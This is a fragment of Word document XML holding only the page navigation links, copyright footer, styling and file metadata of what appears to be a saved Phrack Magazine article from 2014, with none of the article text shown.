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18A" w:rsidRPr="006A418A" w:rsidRDefault="006A418A" w:rsidP="006A418A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FF66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Title</w:t>
      </w:r>
      <w:r w:rsidRPr="006A418A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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A418A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Advanced return-into-lib(c) exploits (PaX case study)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A418A" w:rsidRPr="006A418A" w:rsidRDefault="006A418A" w:rsidP="006A418A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="999999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Author</w:t>
      </w:r>
      <w:r w:rsidRPr="006A418A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:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A418A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nergal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 ==Phrack Inc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.=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Volume 0x0b, Issue 0x3a, Phile #0x04 of 0x0e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|=------------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The advanced return-into-lib(c) exploits: ]=------------=|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|=------------------------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PaX case study ]=---------------------------=|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|=-----------------------------------------------------------------------=|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|=----------------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by Nergal &lt;nergal@owl.openwall.com&gt; ]=--------------=|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                   May this night carry my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will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And may these old mountains forever remember this night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                 May the forest whisper my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name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And may the storm bring these words to the end of all worlds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                            Ihsahn, "Alsvartr"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1 - Intro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1 - Intro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2 - Classical return-into-libc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3 - Chaining return-into-libc calls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3.1 - Problems with the classical approach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3.2 - "esp lifting" method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3.3 - frame faking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3.4 - Inserting null bytes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3.5 - Summary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3.6 - The sample code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4 - PaX features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4.1 - PaX basics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4.2 - PaX and return-into-lib exploits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4.3 - PaX and mmap base randomization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5 - The dynamic linker's dl-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resolve(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function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5.1 - A few ELF data types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5.2 - A few ELF data structures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5.3 - How dl-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resolve(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is called from PLT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5.4 - The conclusion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6 - Defeating PaX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6.1 - Requirements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6.2 - Building the exploit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7 - Misc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7.1 - Portability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7.2 - Other types of vulnerabilities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7.3 - Other non-exec solutions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7.4 - Improving existing non-exec schemes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7.5 - The versions used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8 - Referenced publications and projects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This article can be roughly divided into two parts. First,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advanced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return-into-lib(c) techniques are described. Some of the presented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ideas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or rather similar ones, have already been published by others.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However, the available pieces of information are dispersed, usually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platform-specific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somewhat limited, and the accompanying source code is not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instructive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enough (or at all). Therefore I have decided to assemble the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available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bits and a few of my thoughts into a single document, which should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useful as a convenient reference. Judging by the contents of many posts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security lists, the presented information is by no means the common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knowledge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The second part is devoted to methods of bypassing PaX in case of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stack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buffer overflow (other types of vulnerabilities are discussed at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end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). The recent PaX improvements, namely randomization of addresses the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stack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and the libraries are mmapped at, pose an untrivial challenge for an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exploit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coder. An original technique of calling directly the dynamic linker's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symbol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resolution procedure is presented. This method is very generic and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conditions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required for successful exploitation are usually satisfied.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Because PaX is Intel platform specific, the sample source code has been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prepared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for Linux i386 glibc systems. PaX is not considered sufficiently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stable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by most people; however, the presented techniques (described for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Linux on i386 case) should be portable to other OSes/architectures and can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possibly used to evade other non-executability schemes, including ones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implemented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by hardware.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The reader is supposed to possess the knowledge on standard exploit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techniques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 Articles [1] and [2] should probably be assimilated before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further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reading. [12]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contains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 practical description of ELF internals.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2 - Classical return-into-libc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The classical return-into-libc technique is well described in [2], so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just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 short summary here. This method is most commonly used to evade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protection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offered by the non-executable stack. Instead of returning into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code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located within the stack, the vulnerable function should return into a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memory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area occupied by a dynamic library. It can be achieved by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overflowing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 stack buffer with the following payload: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&lt;- stack grows this way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addresses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grow this way -&gt;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------------------------------------------------------------------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|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buffer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fill-up(*)| function_in_lib | dummy_int32 | arg_1 | arg_2 | ...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------------------------------------------------------------------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^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|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-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this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int32 should overwrite saved return address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 vulnerable function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(*) buffer fill-up should overwrite saved %ebp placeholder as well, if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latter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is used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When the function containing the overflown buffer returns, the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execution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will resume at function_in_lib, which should be the address of a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library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function. From this function's point of view, dummy_int32 will be the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return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address, and arg_1, arg_2 and the following words - the arguments.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Typically, function_in_lib will be the libc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function address, and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arg_1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will point to "/bin/sh".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3 - Chaining return-into-libc calls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3.1 - Problems with the classical approach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The previous technique has two essential limitations. First, it is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impossible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to call another function, which requires arguments, after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function_in_lib.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Why ?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When the function_in_lib returns, the execution will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resume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at address dummy_int32. Well, it can be another library function,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yet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its arguments would have to occupy the same place that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function_in_lib's argument does. Sometimes this is not a problem (see [3]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 generic example).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Observe that the need for more than one function call is frequent. If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vulnerable application temporarily drops privileges (for example, a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setuid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application can do seteuid(getuid())), an exploit must regain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privileges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(with a call to setuid(something) usually) before calling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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A418A" w:rsidRPr="00541D8B" w:rsidRDefault="00541D8B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vertAlign w:val="subscript"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:softHyphen/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The second limitation is that the arguments to function_in_lib cannot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contain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null bytes (in case of a typical overflow caused by string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manipulation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routines). There are two methods to chain multiple library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calls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3.2 - "esp lifting" method      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This method is designed for attacking binaries compiled with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fomit-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frame-pointer flag. In such case, the typical function epilogue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looks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this way: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eplg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addl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$LOCAL_VARS_SIZE,%esp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Suppose f1 and f2 are addresses of functions located in a library. We build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following overflow string (I have skipped buffer fill-up to save space):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&lt;- stack grows this way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addresses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grow this way -&gt;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---------------------------------------------------------------------------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| f1 | eplg | f1_arg1 | f1_arg2 | ... | f1_argn| PAD | f2 | dmm | f2_args...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---------------------------------------------------------------------------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^          ^                                        ^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|          |                                        |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|          | &lt;---------LOCAL_VARS_SIZE-------------&gt;|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|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|-- this int32 should overwrite return address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 vulnerable function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PAD is a padding (consisting of irrelevant nonzero bytes), whose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length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added to the amount of space occupied by f1's arguments, should equal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LOCAL_VARS_SIZE.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How does it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work ?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The vulnerable function will return into f1, which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will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see arguments f1_arg, f1_arg2 etc - OK.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f1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will return into eplg. The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addl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$LOCAL_VARS_SIZE,%esp" instruction will move the stack pointer by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LOCAL_VARS_SIZE, so that it will point to the place where f2 address is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stored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. The "ret" instruction will return into f2, which will see arguments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f2_args. Voila. We called two functions in a row.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The similar technique was shown in [5]. Instead of returning into a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standard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function epilogue, one has to find the following sequence of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instructions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 a program (or library) image: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pop-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popl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any_register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Such a sequence may be created as a result of a compiler optimization of a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standard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epilogue. It is pretty common.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Now, we can construct the following payload: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&lt;- stack grows this way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addresses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grow this way -&gt;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------------------------------------------------------------------------------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|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buffer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fill-up | f1 | pop-ret | f1_arg | f2 | dmm | f2_arg1 | f2_arg2 ...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------------------------------------------------------------------------------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^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|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-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this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int32 should overwrite return address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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0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 vulnerable function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It works very similarly to the previous example. Instead of moving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stack pointer by LOCAL_VARS_SIZE, we move it by 4 bytes with the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popl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any_register" instruction. Therefore, all arguments passed to f1 can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occupy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at most 4 bytes. If we found a sequence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pop-ret2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popl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any_register_1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popl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any_register_2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we could pass to f1 two arguments of 4 bytes size each.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The problem with the latter technique is that it is usually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impossible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to find a "pop-ret" sequence with more than three pops.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Therefore, from now on we will use only the previous variation.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In [6] one can find similar ideas, unfortunately with some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errors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and chaoticly explained.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Note that we can chain an arbitrary number of functions this way. Another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note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observe that we do not need to know the exact location of our payload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that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is, we don't need to know the exact value of the stack pointer). Of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course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if any of the called functions requires a pointer as an argument,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if this pointer should point within our payload, we will need to know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location.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3.3 - frame faking (see [4])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This second technique is designed to attack programs compiled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_without_ -fomit-frame-pointer option. An epilogue of a function in such a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binary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looks like this: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leaveret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leave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Regardless of optimization level used, gcc will always prepend "ret" with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leave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". Therefore, we will not find in such binary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useful "esp lifting"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sequence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(but see later the end of 3.5).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In fact, sometimes the libgcc.a archive contains objects compiled with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fomit-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frame-pointer option. During compilation, libgcc.a is linked into an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executable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by default. Therefore it is possible that a few "add $imm,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%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esp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ret" sequences can be found in an executable. However, we will not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%rely on this gcc feature, as it depends on too many factors (gcc version,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compiler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options used and others).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Instead of returning into "esp lifting" sequence, we will return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into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"leaveret". The overflow payload will consist of logically separated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parts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usually, the exploit code will place them adjacently.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&lt;- stack grows this way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addresses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grow this way -&gt;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FP   saved vuln.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function's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return address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--------------------------------------------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|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buffer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fill-up(*) | fake_ebp0 | leaveret |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-------------------------|------------------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|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+---------------------+         (*) this time, buffer fill-up must not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|                                   overwrite the saved frame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pointer !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-----------------------------------------------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| fake_ebp1 | f1 | leaveret | f1_arg1 | f1_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arg2 ...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-----|-----------------------------------------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|   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first frame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+-+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|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------------------------------------------------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| fake_ebp2 | f2 | leaveret | f2_arg1 | f2_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argv2 ...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-----|------------------------------------------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|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second frame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+-- ...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fake_ebp0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should be the address of the "first frame", fake_ebp1 -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address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of the second frame, etc.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Now, some imagination is needed to visualize the flow of execution.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1) The vulnerable function's epilogue (that is, leave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;ret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puts fake_ebp0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into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%ebp and returns into leaveret.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2) The next 2 instructions (leave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;ret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put fake_ebp1 into %ebp and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return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into f1.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f1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sees appropriate arguments.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3)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f1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executes, then returns.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Steps 2) and 3) repeat, substitute f1 for f2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,f3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,...,fn.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In [4] returning into a function epilogue is not used. Instead, the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author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proposed the following. The stack should be prepared so that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code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would return into the place just after F's prologue, not into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function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 itself. This works very similarly to the presented solution.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However, we will soon face the situation when F is reachable only via PLT.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 such case, it is impossible to return into the address F+something; only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technique presented here will work. (BTW, PLT acronym means "procedure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linkage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table". This term will be referenced a few times more; if it does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not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sound familiar, have a look at the beginning of [3] for a quick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introduction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or at [12] for a more systematic description).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Note that in order to use this technique, one must know the precise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location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of fake frames, because fake_ebp fields must be set accordingly.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 all the frames are located after the buffer fill-up, then one must know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value of %esp after the overflow. However, if we manage somehow to put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fake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frames into a known location in memory (in a static variable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preferably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), there is no need to guess the stack pointer value.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There is a possibility to use this technique against programs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compiled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with -fomit-frame-pointer. In such case, we won't find leave&amp;ret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code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sequence in the program code, but usually it can be found in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startup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routines (from crtbegin.o) linked with the program. Also, we must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change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the "zeroth" chunk to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-------------------------------------------------------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|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buffer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fill-up(*) | leaveret | fake_ebp0 | leaveret |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-------------------------------------------------------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^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|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|-- this int32 should overwrite return address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 vulnerable function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Two leaverets are required, because the vulnerable function will not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up %ebp for us on return. As the "fake frames" method has some advantages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over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"esp lifting", sometimes it is necessary to use this trick even when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attacking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 binary compiled with -fomit-frame-pointer.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3.4 - Inserting null bytes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One problem remains: passing to a function an argument which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contains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0. But when multiple function calls are available, there is a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simple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solution. The first few called functions should insert 0s into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place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occupied by the parameters to the next functions.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Strcpy is the most generic function which can be used.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second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argument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should point to the null byte (located at some fixed place,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probably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 the program image), and the first argument should point to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byte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which is to be nullified. So, thus we can nullify a single byte per a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function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call. If there is need to zero a few int32 location, perhaps other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solutions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will be more space-effective. For example,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sprintf(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some_writable_addr,"%n%n%n%n",ptr1, ptr2, ptr3, ptr4); will nullify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byte at some_writable_addr and nullify int32 locations at ptr1, ptr2,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ptr3, ptr4. Many other functions can be used for this purpose, scanf being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of them (see [5]).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Note that this trick solves one potential problem. If all libraries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mmapped at addresses which contain 0 (as in the case of Solar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Designer non-exec stack patch), we can't return into a library directly,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because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we can't pass null bytes in the overflow payload. But if strcpy (or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sprintf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see [3]) is used by the attacked program, there will be the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appropriate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PLT entry, which we can use. The first few calls should be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calls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to strcpy (precisely, to its PLT entry), which will nullify not the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bytes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 the function's parameters, but the bytes in the function address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itself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. After this preparation, we can call arbitrary functions from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libraries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again.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3.5 - Summary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Both presented methods are similar. The idea is to return from a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called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function not directly into the next one, but into some function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epilogue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which will adjust the stack pointer accordingly (possibly with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help of the frame pointer), and transfer the control to the next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function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 the chain.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In both cases we looked for an appropriate epilogue in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executable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body. Usually, we may use epilogues of library functions as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well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  However, sometimes the library image is not directly reachable. One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such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case has already been mentioned (libraries can be mmapped at addresses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which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contain a null byte), we will face another case soon.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Executable's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image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is not position independent, it must be mmapped at a fixed location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case of Linux, at 0x08048000), so we may safely return into it.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3.6 - The sample code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The attached files, ex-move.c and ex-frames.c, are the exploits for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vuln.c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program. The exploits chain a few strcpy calls and a mmap call.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additional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explanations are given in the following chapter (see 4.2);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anyway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one can use these files as templates for creating return-into-lib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exploits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4 - PaX features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4.1 - PaX basics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If you have never heard of PaX Linux kernel patch, you are advised to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visit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the project homepage [7]. Below there are a few quotations from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PaX documentation.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"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this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document discusses the possibility of implementing non-executable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pages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for IA-32 processors (i.e. pages which user mode code can read or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write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but cannot execute code in).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since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the processor's native page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table/directory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entry format has no provision for such a feature, it is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non-trivial task."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"[...] there is a desire to provide some sort of programmatic way for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protecting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against buffer overflow based attacks.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such idea is the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implementation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of non-executable pages which eliminates the possibility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executing code in pages which are supposed to hold data only[...]"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"[...] possible to write [kernel mode] code which will cause an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inconsistent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state in the DTLB and ITLB entries.[...] this very same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mechanism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would allow for creating another kind of inconsistent state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where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only data read/write accesses would be allowed and code execution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prohibited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.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this is what is needed for protecting against (many)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buffer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overflow based attacks."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To sum up, a buffer overflow exploit usually tries to run code smuggled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within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some data passed to the attacked process. The main PaX functionality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to disallow execution of all data areas - thus PaX renders typical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exploit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techniques useless.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4.2 - PaX and return-into-lib exploits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Initially, non-executable data areas was the only feature of PaX. As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you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may have already guessed, it is not enough to stop return-into-lib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exploits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 Such exploits run code located within libraries or binary itself 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perfectly "legitimate" code. Using techniques described in chapter 3,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is able to run multiple library functions, which is usually more than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enough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to take advantage of the exploited program's privileges.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Even worse, the following code will run successfully on a PaX protected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shellcode[] = "arbitrary code here";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mmap(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0xaa011000, some_length, PROT_EXEC|PROT_READ|PROT_WRITE,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MAP_FIXED|MAP_PRIVATE|MAP_ANON, -1, some_offset);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0xaa011000+1, shellcode);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return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into 0xaa011000+1;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A quick explanation: mmap call will allocate a memory region at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0xaa011000.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is not related to any file object, thanks to the MAP_ANON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flag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combined with the file descriptor equal to -1. The code located at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0xaa011000 can be executed even on PaX (because PROT_EXEC was set in mmap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arguments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 As we see, the arbitrary code placed in "shellcode" will be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executed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Time for code examples. The attached file vuln.c is a simple program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with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an obvious stack overflow. Compile it with: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gcc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-o vuln-omit -fomit-frame-pointer vuln.c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gcc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-o vuln vuln.c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The attached files, ex-move.c and ex-frames.c, are the exploits for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vuln-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omit and vuln binaries, respectively. Exploits attempt to run a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sequence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of strcpy() and mmap() calls. Consult the comments in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README.code for further instructions.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If you plan to test these exploits on a system protected with recent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version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of PaX, you have to disable randomizing of mmap base with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chpax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-r vuln; chpax -r vuln-omit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4.3 - PaX and mmap base randomization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In order to combat return-into-lib(c) exploits, a cute feature was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added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to PaX. If the appropriate option (CONFIG_PAX_RANDMMAP) is set during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kernel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configuration, the first loaded library will be mmapped at random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location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(next libraries will be mmapped after the first one). The same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applies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to the stack. The first library will be mmapped at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0x40000000+random*4k, the stack top will be equal to 0xc0000000-random*16;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both cases, "random" is a pseudo random unsigned 16-bit integer,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obtained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with a call to get_random_bytes(), which yields cryptographically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strong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data.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One can test this behavior by running twice "ldd some_binary"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command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or executing "cat /proc/$$/maps" from within two invocations of a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shell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 Under PaX, the two calls yield different results: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nergal@behemoth 8 &gt; ash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/proc/$$/maps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08048000-08058000 r-xp 00000000 03:45 77590      /bin/ash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08058000-08059000 rw-p 0000f000 03:45 77590      /bin/ash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08059000-0805c000 rw-p 00000000 00:00 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4b150000-4b166000 r-xp 00000000 03:45 107760     /lib/ld-2.1.92.so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4b166000-4b167000 rw-p 00015000 03:45 107760     /lib/ld-2.1.92.so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4b167000-4b168000 rw-p 00000000 00:00 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4b16e000-4b289000 r-xp 00000000 03:45 107767     /lib/libc-2.1.92.so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4b289000-4b28f000 rw-p 0011a000 03:45 107767     /lib/libc-2.1.92.so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4b28f000-4b293000 rw-p 00000000 00:00 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bff78000-bff7b000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rw-p ffffe000 00:00 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exit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nergal@behemoth 9 &gt; ash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/proc/$$/maps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08048000-08058000 r-xp 00000000 03:45 77590      /bin/ash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08058000-08059000 rw-p 0000f000 03:45 77590      /bin/ash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08059000-0805c000 rw-p 00000000 00:00 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48b07000-48b1d000 r-xp 00000000 03:45 107760     /lib/ld-2.1.92.so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48b1d000-48b1e000 rw-p 00015000 03:45 107760     /lib/ld-2.1.92.so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48b1e000-48b1f000 rw-p 00000000 00:00 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48b25000-48c40000 r-xp 00000000 03:45 107767     /lib/libc-2.1.92.so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48c40000-48c46000 rw-p 0011a000 03:45 107767     /lib/libc-2.1.92.so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48c46000-48c4a000 rw-p 00000000 00:00 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bff76000-bff79000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rw-p ffffe000 00:00 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CONFIG_PAX_RANDMMAP feature makes it impossible to simply return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into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 library. The address of a particular function will be different each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time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 binary is run.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This feature has some obvious weaknesses; some of them can (and should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fixed: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1) In case of a local exploit the addresses the libraries and the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stack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are mmapped at can be obtained from the world-readable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/proc/pid_of_attacked_process/maps pseudofile. If the data overflowing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buffer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can be prepared and passed to the victim after the victim process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started, an attacker has all information required to construct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overflow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data. For example, if the overflowing data comes from program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arguments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or environment, a local attacker loses; if the data comes from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some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I/O operation (socket, file read usually), the local attacker wins.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Solution: restrict access to /proc files, just like it is done in many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other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security patches.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2) One can bruteforce the mmap base. Usually (see the end of 6.1) it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enough to guess the libc base. After a few tens of thousands tries, an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attacker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has a fair chance of guessing right. Sure, each failed attempt is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logged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but even large amount of logs at 2 am prevent nothing :) Solution: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deploy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segvguard [8]. It is a daemon which is notified by the kernel each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time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 process crashes with SIGSEGV or similar. Segvguard is able to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temporarily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disable execution of programs (which prevents bruteforcing),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has a few interesting features more. It is worth to use it even without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PaX.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3) The information on the library and stack addresses can leak due to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format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bugs. For example, in case of wuftpd vulnerability, one could explore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stack with the command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site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exec [eat stack]%x.%x.%x...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The automatic variables' pointers buried in the stack will reveal the stack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base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. The dynamic linker and libc startup routines leave on the stack some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pointers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(and return addresses) to the library objects, so it is possible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deduce the libraries base as well.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4) Sometimes, one can find a suitable function in an attacked binary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which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is not position-independent and can't be mmapped randomly). For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example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"su" has a function (called after successful authentication) which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acquires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root privileges and executes a shell - nothing more is needed.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5) All library functions used by a vulnerable program can be called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via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their PLT entry. Just like the binary, PLT must be present at a fixed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address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 Vulnerable programs are usually large and call many functions, so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there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is some probability of finding interesting stuff in PLT.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In fact only the last three problems cannot be fixed, and none of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them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is guaranteed to manifest in a manner allowing successful exploitation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fourth is very rare). We certainly need more generic methods.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In the following chapter I will describe the interface to the dynamic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linker's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dl-resolve() function. If it is passed appropriate arguments, one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them being an asciiz string holding a function name, it will determine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actual function address. This functionality is similar to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dlsym()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function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  Using the dl-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resolve(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function, we are able to build a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return-into-lib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exploit, which will return into a function, whose address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not known at exploit's build time. [12]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also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describes a method of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acquiring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 function address by its name, but the presented technique is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useless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for our purposes.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5 - The dynamic linker's dl-resolve() function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This chapter is simplified as much as possible. For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detailed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description, see [9] and glibc sources, especially the file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dl-runtime.c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. See also [12].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5.1 - A few ELF data types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 following definitions are taken from the include file elf.h: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typedef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uint32_t Elf32_Addr;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typedef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uint32_t Elf32_Word;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typedef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struct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Elf32_Addr    r_offset;               /* Address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Elf32_Word    r_info;                 /* Relocation type and symbol index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 Elf32_Rel;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/* How to extract and insert information held in the r_info field. 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ELF32_R_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SYM(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val)                ((val) &gt;&gt; 8)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ELF32_R_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val)               ((val) &amp; 0xff)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typedef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struct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Elf32_Word    st_name;   /* Symbol name (string tbl index)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Elf32_Addr    st_value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 /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 Symbol value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Elf32_Word    st_size;   /* Symbol size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char st_info;   /* Symbol type and binding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char st_other;  /* Symbol visibility under glibc&gt;=2.2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Elf32_Section st_shndx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 /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 Section index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 Elf32_Sym;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The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fields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st_size, st_info and st_shndx are not used during symbol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resolution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5.2 - A few ELF data structures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The ELF executable file contains a few data structures (arrays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mainly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which are of some interest for us. The location of these structures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be retrieved from the executable's dynamic section. "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objdump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-x file"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will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display the contents of the dynamic section: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objdump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-x some_executable     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...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some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other interesting stuff...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Dynamic Section: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...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STRTAB      0x80484f8 the location of string table (type char *)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SYMTAB      0x8048268 the location of symbol table (type Elf32_Sym*)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....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JMPREL      0x8048750 the location of table of relocation entries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related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to PLT (type Elf32_Rel*)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...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VERSYM      0x80486a4 the location of array of version table indices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(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uint16_t*)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objdump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-x" will also reveal the location of .plt section, 0x08048894 in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example below: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11 .plt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00000230  08048894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08048894  00000894  2**2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CONTENTS, ALLOC, LOAD, READONLY, CODE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5.3 - How dl-resolve() is called from PLT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A typical PLT entry (when elf format is elf32-i386) looks this way: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gdb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disas some_func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Dump of assembler code for function some_func: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0x804xxx4 &lt;some_func&gt;:     jmp    *some_func_dyn_reloc_entry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0x804xxxa &lt;some_func+6&gt;:   push   $reloc_offset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0x804xxxf &lt;some_func+11&gt;:  jmp    beginning_of_.plt_section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PLT entries differ only by $reloc_offset value (and the value of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some_func_dyn_reloc_entry, but the latter is not used for the symbol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resolution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algorithm).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As we see, this piece of code pushes $reloc_offset onto the stack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jumps at the beginning of .plt section. After a few instructions,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control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is passed to dl-resolve() function, reloc_offset being one of its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arguments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(the second one, of type struct link_map *, is irrelevant for us).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 following is the simplified dl-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resolve(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algorithm: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1)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some_func's relocation entry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Elf32_Rel * reloc = JMPREL + reloc_offset;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2)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some_func's symtab entry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Elf32_Sym * sym = &amp;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SYMTAB[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ELF32_R_SYM (reloc-&gt;r_info) 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3)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sanity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check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assert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(ELF32_R_TYPE(reloc-&gt;r_info) == R_386_JMP_SLOT);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4)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late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glibc 2.1.x (2.1.92 for sure) or newer, including 2.2.x, performs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another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check.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sym-&gt;st_other &amp; 3 != 0, the symbol is presumed to have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been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resolved before, and the algorithm goes another way (and probably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ends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with SIGSEGV in our case). We must ensure that sym-&gt;st_other &amp;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3 == 0.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5)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symbol versioning is enabled (usually is), determine the version table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index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uint16_t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ndx = VERSYM[ ELF32_R_SYM (reloc-&gt;r_info) ];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find version information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const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struct r_found_version *version =&amp;l-&gt;l_versions[ndx];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where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l is the link_map parameter. The important part here is that ndx must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 legal value, preferably 0, which means "local symbol".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6)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function name (an asciiz string) is determined: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name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STRTAB + sym-&gt;st_name;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7) The gathered information is sufficient to determine some_func's address.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The results are cached in two variables of type Elf32_Addr, located at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reloc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-&gt;r_offset and sym-&gt;st_value.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8) The stack pointer is adjusted, some_func is called.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Note: in case of glibc, this algorithm is performed by the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fixup(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function,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called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by dl-runtime-resolve().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5.4 - The conclusion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Suppose we overflow a stack buffer with the following payload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--------------------------------------------------------------------------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|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buffer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fill-up | .plt start | reloc_offset | ret_addr | arg1 | arg2 ...       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--------------------------------------------------------------------------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^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|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-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this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int32 should overwrite saved return address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 vulnerable function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If we prepare appropriate sym and reloc variables (of type Elf32_Sym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Elf32_Rel, respectively), and calculate appropriate reloc_offset, the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control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will be passed to the function, whose name is found at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STRTAB + sym-&gt;st_name (we control it of course). Arguments arg1, arg2 will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placed appropriately, and still we have opportunity to return into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another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function (ret_addr).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The attached dl-resolve.c is a sample code which implements the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described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technique. Beware, you have to compile it twice (see the comments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the README.code).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6 - Defeating PaX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6.1 - Requirements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In order to use the "ret-into-dl" technique described in chapter 5,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need to position a few structures at appropriate locations. We will need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function, which is capable of moving bytes to a selected place.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obvious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choice is strcpy; strncpy, sprintf or similar would do as well. So,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just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like in [3], we will require that there is a PLT entry for strcpy in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attacked program's image.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"Ret-into-dl" solves a problem with randomly mmapped libraries;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however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the problem of the stack remains. If the overflow payload resides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the stack, its address will be unknown, and we will be unable to insert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0s into it with strcpy (see 3.3). Unfortunately, I haven't come up with a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generic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solution (anyone?). Two methods are possible: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1)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scanf() function is available in PLT, we may try to execute something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like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"%s\n",fixed_location)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which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will copy from stdin appropriate payload into fixed_location. When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using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"fake frames" technique, the stack frames can be disjoint, so we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will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be able to use fixed_location as frames.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2)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the attacked binary is compiled with -fomit-frame-pointer, we can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chain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multiple strcpy calls with the "esp lifting" method even if %esp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unknown  (see the note at the end of 3.2). The nth strcpy would have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following arguments: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fixed_location+n, a_pointer_within_program_image)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This way we can construct, byte by byte, appropriate frames at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fixed_location. When it is done, we switch from "esp lifting" to "fake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frames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 with the trick described at the end of 3.3.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More similar workarounds can be devised, but in fact they usually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will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not be needed. It is very likely that even a small program will copy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some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user-controlled data into a static or malloced variable, thus saving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the work described above.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To sum up, we will require two (fairly probable) conditions to be met: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6.1.1) strcpy (or strncpy, sprintf or similar) is available via PLT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6.1.2) during normal course of execution, the attacked binary copies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user-provided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data into a static (preferably) or malloced variable.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6.2 - Building the exploit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We will try to emulate the code in dl-resolve.c sample exploit. When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rwx memory area is prepared with mmap (we will call mmap with the help of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ret-into-dl), we will strcpy the shellcode there and return into the copied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shellcode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 We discuss the case of the attacked binary having been compiled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without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-fomit-frame-pointer and the "frame faking" method.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We need to make sure that three related structures are placed properly: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1) Elf32_Rel reloc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2) Elf32_Sym sym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3)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short verind (which should be 0)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How the addresses of verind and sym are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related ?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Let's assign to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"real_index" the value of ELF32_R_SYM (reloc-&gt;r_info); then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sym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is at SYMTAB+real_index*sizeof(Elf32_Sym)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verind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is at VERSYM+real_index*sizeof(short)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It looks natural to place verind at some place in .data or .bss section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nullify it with two strcpy calls. Unfortunately, in such case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real_index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tends to be rather large. As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sizeof(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Elf32_Sym)=16, which is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larger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than sizeof(short), sym would likely be assigned the address beyond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process' data space. That is why in dl-resolve.c sample program (though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is very small) we have to allocate a few tens of thousands (RQSIZE) of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bytes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Well, we can arbitrarily enlarge a process' data space with setting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MALLOC_TOP_PAD_ environ variable (remember traceroute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exploit ?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), but this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would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work only in case of a local exploit. Instead, we will choose more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generic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(and cheaper) method. We will place verind lower, usually within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read-only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mmapped region, so we need to find a null short there.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exploit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will relocate "sym" structure into an address determined by verind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location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Where to look for this null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short ?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First, we should determine (by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consulting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/proc/pid/maps just before the attacked program crashes)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bounds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of the memory region  which is mmapped writable (the executable's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data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area) when the overflow occurs. Say, these are the addresses within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[low_addr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,hi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_addr]. We will copy "sym" structure there. A simple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calculation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tells us that real_index must be within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[(low_addr-SYMTAB)/16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hi_addr-SYMTAB)/16], so we have to look for null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short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within [VERSYM+(low_addr-SYMTAB)/8, VERSYM+(hi_addr-SYMTAB)/8].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Having found a suitable verind, we have to check additionally that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1) sym's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address won't intersect our fake frames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2) sym's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address won't overwrite any internal linker data (like strcpy's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GOT entry)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3)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remember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that the stack pointer will be moved to the static data area.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There must be enough room for stack frames allocated by the dynamic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linker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procedures. So,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best (though not necessary) to place "sym"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our fake frames.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An advice: it's better to look for a suitable null short with gdb,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than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analyzing "objdump -s" output. The latter does not display memory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placed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after .rodata section.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The attached ex-pax.c file is a sample exploit against pax.c.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only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difference between vuln.c and pax.c is that the latter copies another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environment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variable into a static buffer (so 6.1.2 is satisfied).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7 - Misc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7.1 - Portability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Because PaX is designed for Linux, throughout this document we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focused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on this OS. However, presented techniques are OS independent. Stack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frame pointers, C calling conventions, ELF specification - all these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definitions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are widely used. In particular, I have successfully run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dl-resolve.c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on Solaris i386 and FreeBSD. To be exact, mmap's fourth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argument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had to be adjusted (looks like MAP_ANON has different value on BSD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  In case of these two OS, the dynamic linker do not feature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symbol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versions, so ret-into-dl is even easier to accomplish. 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7.2 - Other types of vulnerabilities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All presented techniques are based on stack buffer overflow. All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return-into-something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exploits rely on the fact that with a single overflow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can not only modify %eip, but also place function arguments (after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return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address) at the stack top.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Let's consider two other large classes of vulnerabilities: malloc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control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structures corruption and format string attacks. In case of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previous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we may at most count on overwriting an arbitrary int with an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arbitrary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value - it is too little to bypass PaX protection genericly. In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case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of the latter, we may usually alter arbitrary number of bytes. If we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could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overwrite saved %ebp and %eip of any function, we wouldn't need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anything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more; but because the stack base is randomized, there is no way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determine the address of any frame.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***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(Digression: saved FP is a pointer which can be used as an argument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%hn. But the succesfull exploitation would require three function returns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preferably an appropriately located user-controlled 64KB buffer.)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***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hope that it is obvious that changing some GOT entry (that is, gaining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control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over %eip only) is not enough to evade PaX.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However, there is an exploitable scenario that is likely to happen.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Let's assume three conditions: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1) The attacked binary has been compiled with -fomit-frame-pointer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2) There is a function f1, which allocates a stack buffer whose content we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control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3) There is a format bug (or a misused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free(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in the function f2, which is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called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(possibly indirectly) by f1.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 sample vulnerable code follows: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void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f2(char * buf)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printf(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buf); // format bug here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some_libc_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function(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void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f1(char * user_controlled)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buf[1024];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buf[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0] = 0;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strncat(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buf, user_controlled, sizeof(buf)-1);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f2(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buf);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Suppose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f1(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is being called. With the help of a malicious format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we can alter some_libc_function's GOT entry so that it contains the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address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of the following piece of code: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addl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$imm, %esp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that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is, some epilogue of a function. In such case, when some_libc_function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called, the "addl $imm, %esp" instruction will alter %esp. If we choose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epilogue with a proper $imm, %esp will point within "buf" variable,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whose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content is user controlled. From this moment on, the situation looks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just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like in case of a stack buffer overflow. We can chain functions, use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ret-into-dl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etc.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Another case: a stack buffer overflow by a single byte. Such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overflow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nullifies the least significant byte of a saved frame pointer.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 the second function return, an attacker has a fair chance to gain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full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control over the stack, which enables him to use all the presented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techniques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.       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7.3 - Other non-exec solutions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I am aware of two other solutions, which make all data areas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non-executable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on Linux i386. The first one is RSX [10]. However, this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solution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does not implement stack nor libraries base randomization, so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techniques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described in chapter 3 are sufficient to chain multiple function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calls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Some additional effort must be invested if we want to execute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arbitrary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code. On RSX, one is not allowed to execute code placed in a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writable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memory area, so the mmap(...PROT_READ|PROT_WRITE|PROT_EXEC) trick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not work. But any non-exec scheme must allow to execute code from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shared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libraries. In RSX case, it is enough to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mmap(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...PROT_READ|PROT_EXEC)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file containing a shellcode. In case of a remote exploit, the function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chaining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allows us to even create such a file first.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The second solution,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kNoX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[11], is very similar to RSX. Additionally,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mmaps all libraries at addresses starting at 0x00110000 (just like in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case of Solar's patch). As mentioned at the end of 3.4, this protection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insufficient as well.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7.4 - Improving existing non-exec schemes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(Un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)fortunately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I don't see a way to fix PaX so that it would be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immune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to the presented techniques. Clearly, ELF standard specifies too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many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features useful for attackers. Certainly, some of presented tricks can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stopped from working. For example, it is possible to patch the kernel so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that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it would not honor MAP_FIXED flag when PROT_EXEC is present. Observe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this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would not prevent shared 